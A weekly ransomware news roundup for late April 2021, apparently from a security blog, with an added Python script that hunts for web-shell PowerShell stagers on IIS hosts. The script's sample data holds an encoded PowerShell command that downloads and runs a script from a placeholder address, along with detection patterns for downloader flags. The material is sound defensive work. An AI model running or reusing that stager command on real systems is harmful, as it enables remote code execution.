Tuesday, May 18, 2021

An overview of incidents involving ransomware from April 26 to May 3, 2021

The main news last week was the announcement by the Babuk Locker operators that they were ending their criminal activities.

The past week was marked by a number of major cyberattacks using ransomware.

Merseyrail, the commuter rail network serving Liverpool and the surrounding Merseyside metropolitan area, fell victim to a cyberattack using the Lockbit ransomware. The attackers used the company's own e-mail system to send employees and journalists a message titled “Lockbit Ransomware Attack and Data Theft”, announcing the attack themselves.

The municipality of Whistler, British Columbia, Canada, was also hit by a ransomware attack, which took down the municipality's network, website, e-mail and telephone systems.

The Babuk Locker operators, who attacked the Metropolitan Police Department of the District of Columbia (Washington, D.C., USA), threatened to release criminal investigation files and to expose police informants if the ransom was not paid. The attackers gained access to investigation reports, disciplinary files of police officers, documents on local organized criminal groups (OCGs), photographs of suspects and administrative records; by their own account they stole more than 250 GB of data in total.

However, after only a few months of activity, the Babuk operators decided to end their criminal activities. On their dark web leak site they posted a short message announcing their intention to leave the business, saying they had already achieved their goal. Unlike other defunct ransomware groups, which have openly released decryption keys or even refunded ransoms to their victims, Babuk's operators decided instead to publish the source code of their ransomware.

For reasons unknown, the operators of the REvil ransomware have removed Apple's stolen schematics from their data leak site. The group had breached the systems of Quanta Computer, an Apple manufacturing partner, and stolen blueprints for future MacBook laptops and other devices. The attackers demanded a $50 million ransom from Quanta Computer by April 27 and threatened otherwise to release more than a dozen diagrams and drawings of MacBook components. Quanta Computer and Apple refused to negotiate, and the REvil group has since removed all mention of the hack and the schematics it had already published.

A security researcher using the dnwls0719 alias has discovered new versions of Dharma ransomware that add .ALNBR and .cum extensions to encrypted files.

In its quarterly report, Coveware noted that the average ransom payment rose sharply in the first three months of 2021, to $220,298, compared with $154,108 in the last three months of 2020. One reason for the increase is the heightened activity of a number of ransomware groups demanding millions of dollars in bitcoin for the key to recover encrypted data.

A security researcher using the PCrisk alias discovered a new variant of Phobos ransomware that adds the .lookfornewitguy extension.

Microsoft SharePoint servers have now joined the list of Internet-facing systems that ransomware groups exploit to get into corporate networks. The group behind these attacks is tracked as Hello or WickrMe (after the encrypted Wickr messenger it uses to negotiate with victims). Hello/WickrMe intrusions typically begin by exploiting CVE-2019-0604, a remote code execution vulnerability in Microsoft SharePoint Server. The flaw lets attackers take control of the SharePoint server and plant a web shell, which is then used to install a Cobalt Strike beacon. The beacon runs automated PowerShell scripts that ultimately download and install the latest Hello ransomware.
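The chain described above (web shell on the SharePoint server, then PowerShell pulling the next stage) leaves one footprint a defender can hunt for on any IIS host: the IIS worker process w3wp.exe spawning a command interpreter, often with an encoded or hidden-window PowerShell command line. The script below is an added example, not code from the original post, from Microsoft or from any vendor. It assumes a simplified Sysmon-style process-creation record with ParentImage, Image and CommandLine fields (a simplification; real Sysmon event ID 1 records carry more), and runs over three constructed sample events.

```python
import base64
import re

# Interpreters and LOLBins an IIS worker process has no business launching.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe",
    "certutil.exe", "mshta.exe",
}

# Command-line traits typical of a PowerShell stager.
SUSPICIOUS_FLAGS = re.compile(
    r"(?i)(-nop\b|-w(?:indowstyle)?\s+hidden|downloadstring|downloadfile"
    r"|\biex\b|invoke-expression)"
)

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_ARG = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")


def encode_ps(script):
    """Encode a script the way `powershell -EncodedCommand` expects (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    """Lower-case file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Score one process-creation event; returns alert flag, reasons and any decoded payload."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)

    reasons = []
    iis_spawn = parent == "w3wp.exe" and child in SUSPICIOUS_CHILDREN
    if iis_spawn:
        reasons.append(f"IIS worker w3wp.exe spawned {child}")
    if decoded is not None:
        reasons.append("encoded PowerShell command: " + decoded)
    if SUSPICIOUS_FLAGS.search(cmdline + " " + (decoded or "")):
        reasons.append("hidden-window/download indicators on command line")

    # Alert when the IIS worker launches an interpreter, or when an encoded
    # command unpacks to a downloader regardless of which process ran it.
    downloader = decoded is not None and bool(SUSPICIOUS_FLAGS.search(decoded))
    return {"alert": iis_spawn or downloader, "reasons": reasons, "decoded": decoded}


def scan(events):
    return [analyze_event(e) for e in events]


# Constructed sample events (not real telemetry). 192.0.2.10 is a documentation address.
SAMPLE_EVENTS = [
    {   # web shell under the IIS worker launching a hidden, encoded PowerShell stager
        "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(
            "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"),
    },
    {   # ASP.NET compiling a page: a normal child of w3wp.exe, must not alert
        "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
        "CommandLine": "csc.exe /t:library /out:App_Web_x.dll",
    },
    {   # an administrator running PowerShell interactively, must not alert
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Get-Process",
    },
]

if __name__ == "__main__":
    for event, result in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        status = "ALERT" if result["alert"] else "ok   "
        print(status, basename(event["ParentImage"]), "->", basename(event["Image"]),
              "; ".join(result["reasons"]))
```

Only the first event raises an alert; csc.exe under w3wp.exe is routine ASP.NET compilation and an operator's interactive PowerShell has no stager traits. In production the same logic applies to Sysmon event ID 1 or Windows Security event 4688 (with command-line auditing enabled), and the child-process list should be tuned to what the SharePoint farm legitimately launches.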

The REvil ransomware group attacked the judicial network of the Brazilian state of Rio Grande do Sul, encrypting files on computers and forcing the courts to suspend their activity. In a Twitter post, the Tribunal de Justiça do Estado do Rio Grande do Sul (TJRS) reported the incident and advised “internal users not to remotely access a computer or log into computers on the TJRS network”. The attackers demanded $5 million to restore the data.

Seeking financial gain, cybercriminals exploited a vulnerability in SonicWall SMA 100 series appliances to deploy FiveHands ransomware on networks in North America and Europe. The group tracked as UNC2447 exploited CVE-2021-20016 before SonicWall patched it in February 2021. The same vulnerability had been used in January 2021 in the attack on SonicWall's own internal systems.

QNAP customers are once again strongly urged to secure their network-attached storage (NAS) devices against the AgeLocker ransomware operators targeting their data. A QNAP PSIRT spokesperson said the NAS devices recently compromised by AgeLocker were running outdated firmware.
